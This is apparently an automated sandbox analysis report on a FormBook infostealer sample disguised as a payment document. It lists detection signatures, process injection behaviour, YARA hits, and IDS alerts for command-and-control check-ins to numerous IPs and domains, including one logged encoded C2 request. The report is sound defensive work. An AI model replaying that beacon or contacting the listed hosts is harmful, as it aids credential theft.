Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment&WarantyBonds.exe

Overview

General Information

Sample name:Payment&WarantyBonds.exe
(renamed file extension from bat to exe)
Original sample name:Payment&WarantyBonds.bat
Analysis ID:1545791
MD5:a9da1b42f6ad80ee6085f69e6c25f49b
SHA1:e7f51c3eb496a278999fd893e1fcfca8a685f854
SHA256:4e6fe41b2158546ebc7d5dcfe13aa832e3ce5025b36e0cfcc9d7f373e1a0a089
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Payment&WarantyBonds.exe (PID: 7284 cmdline: "C:\Users\user\Desktop\Payment&WarantyBonds.exe" MD5: A9DA1B42F6AD80EE6085F69E6C25F49B)
    • Payment&WarantyBonds.exe (PID: 7516 cmdline: "C:\Users\user\Desktop\Payment&WarantyBonds.exe" MD5: A9DA1B42F6AD80EE6085F69E6C25F49B)
      • lVlYtqLlYCJP.exe (PID: 3264 cmdline: "C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • systeminfo.exe (PID: 7876 cmdline: "C:\Windows\SysWOW64\systeminfo.exe" MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
          • lVlYtqLlYCJP.exe (PID: 3132 cmdline: "C:\Program Files (x86)\fYDLcCyaMmIgCIuJvQtuhYKweaZKobtovnkkWnpRVzoAFQNOKevwszFmxGofsYScF\lVlYtqLlYCJP.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8020 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.2021577870.0000000001740000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.4106735496.0000000004570000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000008.00000002.4108148789.0000000004A70000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.Payment&WarantyBonds.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.Payment&WarantyBonds.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-31T01:37:50.382091+010020507451Malware Command and Control Activity Detected192.168.2.4497413.33.130.19080TCP
                2024-10-31T01:38:15.034711+010020507451Malware Command and Control Activity Detected192.168.2.449825103.120.80.11180TCP
                2024-10-31T01:38:29.080670+010020507451Malware Command and Control Activity Detected192.168.2.449905217.160.0.6080TCP
                2024-10-31T01:38:42.753096+010020507451Malware Command and Control Activity Detected192.168.2.449989161.97.142.14480TCP
                2024-10-31T01:38:56.317263+010020507451Malware Command and Control Activity Detected192.168.2.45002313.248.169.4880TCP
                2024-10-31T01:39:10.123446+010020507451Malware Command and Control Activity Detected192.168.2.450027198.251.84.20080TCP
                2024-10-31T01:39:23.645578+010020507451Malware Command and Control Activity Detected192.168.2.450031172.67.154.6780TCP
                2024-10-31T01:39:39.279821+010020507451Malware Command and Control Activity Detected192.168.2.45003520.2.249.780TCP
                2024-10-31T01:39:53.314383+010020507451Malware Command and Control Activity Detected192.168.2.450039203.161.49.19380TCP
                2024-10-31T01:40:06.732795+010020507451Malware Command and Control Activity Detected192.168.2.450043199.59.243.22780TCP
                2024-10-31T01:40:20.625049+010020507451Malware Command and Control Activity Detected192.168.2.450047217.76.156.25280TCP
                2024-10-31T01:40:34.373602+010020507451Malware Command and Control Activity Detected192.168.2.450051144.76.190.3980TCP
                2024-10-31T01:40:48.154933+010020507451Malware Command and Control Activity Detected192.168.2.45005534.92.128.5980TCP
                2024-10-31T01:41:02.061922+010020507451Malware Command and Control Activity Detected192.168.2.450059152.42.255.4880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-31T01:37:50.382091+010028554651A Network Trojan was detected192.168.2.4497413.33.130.19080TCP
                2024-10-31T01:38:15.034711+010028554651A Network Trojan was detected192.168.2.449825103.120.80.11180TCP
                2024-10-31T01:38:29.080670+010028554651A Network Trojan was detected192.168.2.449905217.160.0.6080TCP
                2024-10-31T01:38:42.753096+010028554651A Network Trojan was detected192.168.2.449989161.97.142.14480TCP
                2024-10-31T01:38:56.317263+010028554651A Network Trojan was detected192.168.2.45002313.248.169.4880TCP
                2024-10-31T01:39:10.123446+010028554651A Network Trojan was detected192.168.2.450027198.251.84.20080TCP
                2024-10-31T01:39:23.645578+010028554651A Network Trojan was detected192.168.2.450031172.67.154.6780TCP
                2024-10-31T01:39:39.279821+010028554651A Network Trojan was detected192.168.2.45003520.2.249.780TCP
                2024-10-31T01:39:53.314383+010028554651A Network Trojan was detected192.168.2.450039203.161.49.19380TCP
                2024-10-31T01:40:06.732795+010028554651A Network Trojan was detected192.168.2.450043199.59.243.22780TCP
                2024-10-31T01:40:20.625049+010028554651A Network Trojan was detected192.168.2.450047217.76.156.25280TCP
                2024-10-31T01:40:34.373602+010028554651A Network Trojan was detected192.168.2.450051144.76.190.3980TCP
                2024-10-31T01:40:48.154933+010028554651A Network Trojan was detected192.168.2.45005534.92.128.5980TCP
                2024-10-31T01:41:02.061922+010028554651A Network Trojan was detected192.168.2.450059152.42.255.4880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-31T01:38:07.598005+010028554641A Network Trojan was detected192.168.2.449778103.120.80.11180TCP
                2024-10-31T01:38:10.137350+010028554641A Network Trojan was detected192.168.2.449793103.120.80.11180TCP
                2024-10-31T01:38:12.532648+010028554641A Network Trojan was detected192.168.2.449809103.120.80.11180TCP
                2024-10-31T01:38:21.176902+010028554641A Network Trojan was detected192.168.2.449861217.160.0.6080TCP
                2024-10-31T01:38:23.716558+010028554641A Network Trojan was detected192.168.2.449876217.160.0.6080TCP
                2024-10-31T01:38:26.423593+010028554641A Network Trojan was detected192.168.2.449889217.160.0.6080TCP
                2024-10-31T01:38:35.120489+010028554641A Network Trojan was detected192.168.2.449941161.97.142.14480TCP
                2024-10-31T01:38:37.663882+010028554641A Network Trojan was detected192.168.2.449957161.97.142.14480TCP
                2024-10-31T01:38:40.214668+010028554641A Network Trojan was detected192.168.2.449973161.97.142.14480TCP
                2024-10-31T01:38:49.039066+010028554641A Network Trojan was detected192.168.2.45001913.248.169.4880TCP
                2024-10-31T01:38:51.239627+010028554641A Network Trojan was detected192.168.2.45002113.248.169.4880TCP
                2024-10-31T01:38:53.724340+010028554641A Network Trojan was detected192.168.2.45002213.248.169.4880TCP
                2024-10-31T01:39:02.342212+010028554641A Network Trojan was detected192.168.2.450024198.251.84.20080TCP
                2024-10-31T01:39:04.999354+010028554641A Network Trojan was detected192.168.2.450025198.251.84.20080TCP
                2024-10-31T01:39:07.607846+010028554641A Network Trojan was detected192.168.2.450026198.251.84.20080TCP
                2024-10-31T01:39:15.979873+010028554641A Network Trojan was detected192.168.2.450028172.67.154.6780TCP
                2024-10-31T01:39:18.539676+010028554641A Network Trojan was detected192.168.2.450029172.67.154.6780TCP
                2024-10-31T01:39:21.058398+010028554641A Network Trojan was detected192.168.2.450030172.67.154.6780TCP
                2024-10-31T01:39:31.671887+010028554641A Network Trojan was detected192.168.2.45003220.2.249.780TCP
                2024-10-31T01:39:34.217233+010028554641A Network Trojan was detected192.168.2.45003320.2.249.780TCP
                2024-10-31T01:39:36.767358+010028554641A Network Trojan was detected192.168.2.45003420.2.249.780TCP
                2024-10-31T01:39:45.651484+010028554641A Network Trojan was detected192.168.2.450036203.161.49.19380TCP
                2024-10-31T01:39:48.238767+010028554641A Network Trojan was detected192.168.2.450037203.161.49.19380TCP
                2024-10-31T01:39:50.762782+010028554641A Network Trojan was detected192.168.2.450038203.161.49.19380TCP
                2024-10-31T01:39:59.069159+010028554641A Network Trojan was detected192.168.2.450040199.59.243.22780TCP
                2024-10-31T01:40:01.570939+010028554641A Network Trojan was detected192.168.2.450041199.59.243.22780TCP
                2024-10-31T01:40:04.158593+010028554641A Network Trojan was detected192.168.2.450042199.59.243.22780TCP
                2024-10-31T01:40:12.916689+010028554641A Network Trojan was detected192.168.2.450044217.76.156.25280TCP
                2024-10-31T01:40:15.514697+010028554641A Network Trojan was detected192.168.2.450045217.76.156.25280TCP
                2024-10-31T01:40:18.091170+010028554641A Network Trojan was detected192.168.2.450046217.76.156.25280TCP
                2024-10-31T01:40:26.733225+010028554641A Network Trojan was detected192.168.2.450048144.76.190.3980TCP
                2024-10-31T01:40:29.377192+010028554641A Network Trojan was detected192.168.2.450049144.76.190.3980TCP
                2024-10-31T01:40:31.852057+010028554641A Network Trojan was detected192.168.2.450050144.76.190.3980TCP
                2024-10-31T01:40:40.563346+010028554641A Network Trojan was detected192.168.2.45005234.92.128.5980TCP
                2024-10-31T01:40:43.108008+010028554641A Network Trojan was detected192.168.2.45005334.92.128.5980TCP
                2024-10-31T01:40:45.639263+010028554641A Network Trojan was detected192.168.2.45005434.92.128.5980TCP
                2024-10-31T01:40:54.436275+010028554641A Network Trojan was detected192.168.2.450056152.42.255.4880TCP
                2024-10-31T01:40:56.969192+010028554641A Network Trojan was detected192.168.2.450057152.42.255.4880TCP
                2024-10-31T01:40:59.498644+010028554641A Network Trojan was detected192.168.2.450058152.42.255.4880TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: Payment&WarantyBonds.exeReversingLabs: Detection: 45%
                Source: Payment&WarantyBonds.exeVirustotal: Detection: 40%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.Payment&WarantyBonds.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Payment&WarantyBonds.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2021577870.0000000001740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4106735496.0000000004570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4105782211.00000000005B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2020861134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4108148789.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4106690765.0000000004520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4106710053.00000000041D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2022730147.00000000031C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: Payment&WarantyBonds.exeJoe Sandbox ML: detected
                Source: Payment&WarantyBonds.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Payment&WarantyBonds.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: sysinfo.pdb source: Payment&WarantyBonds.exe, 00000002.00000002.2021166818.0000000001378000.00000004.00000020.00020000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000006.00000002.4106349001.0000000001298000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sysinfo.pdbGCTL source: Payment&WarantyBonds.exe, 00000002.00000002.2021166818.0000000001378000.00000004.00000020.00020000.00000000.sdmp, lVlYtqLlYCJP.exe, 00000006.00000002.4106349001.0000000001298000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lVlYtqLlYCJP.exe, 00000006.00000000.1945290809.0000000000E3E000.00000002.00000001.01000000.0000000C.sdmp, lVlYtqLlYCJP.exe, 00000008.00000000.2099378604.0000000000E3E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: Payment&WarantyBonds.exe, 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2024409473.0000000004358000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2026389325.0000000004500000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Payment&WarantyBonds.exe, Payment&WarantyBonds.exe, 00000002.00000002.2021716135.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, systeminfo.exe, 00000007.00000002.4106815132.000000000484E000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4106815132.00000000046B0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2024409473.0000000004358000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2026389325.0000000004500000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_005CC500 FindFirstFileW,FindNextFileW,FindClose,7_2_005CC500
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 4x nop then xor eax, eax7_2_005B9E20
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 4x nop then mov ebx, 00000004h7_2_04A004DE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49741 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49778 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49793 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49809 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49876 -> 217.160.0.60:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49905 -> 217.160.0.60:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49905 -> 217.160.0.60:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49889 -> 217.160.0.60:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49957 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49973 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49989 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49989 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49861 -> 217.160.0.60:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50031 -> 172.67.154.67:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50031 -> 172.67.154.67:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 172.67.154.67:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50023 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50035 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50035 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 198.251.84.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50023 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 198.251.84.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 172.67.154.67:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50039 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50039 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 172.67.154.67:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 144.76.190.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50056 -> 152.42.255.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50051 -> 144.76.190.39:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50051 -> 144.76.190.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 144.76.190.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50057 -> 152.42.255.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 217.76.156.252:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 217.76.156.252:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 198.251.84.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50055 -> 34.92.128.59:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50055 -> 34.92.128.59:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 217.76.156.252:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50059 -> 152.42.255.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50059 -> 152.42.255.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50027 -> 198.251.84.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49941 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50027 -> 198.251.84.200:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49825 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50058 -> 152.42.255.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50052 -> 34.92.128.59:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49825 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50047 -> 217.76.156.252:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50047 -> 217.76.156.252:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50042 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50054 -> 34.92.128.59:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50050 -> 144.76.190.39:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50043 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50043 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50053 -> 34.92.128.59:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.030002059.xyz
                Source: DNS query: www.xipowerplay.xyz
                Source: DNS query: www.091210.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 20.2.249.7 20.2.249.7
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
                Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /nhtq/?78=0+mU6fX4mGgH3aI4KvnZ0Dnt9NN9uhfQ4WQLoO9YJQq1rLkiV3mWe/ShpiWb6GRwN8XKSHyyPlz1ODC2MK0vYsx4EzdsG0j0QesGBnWjRvygBOdKdkC21k4=&hrOd=1DzdIBZXhZaHw2Wp HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.5Host: www.iampinky.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
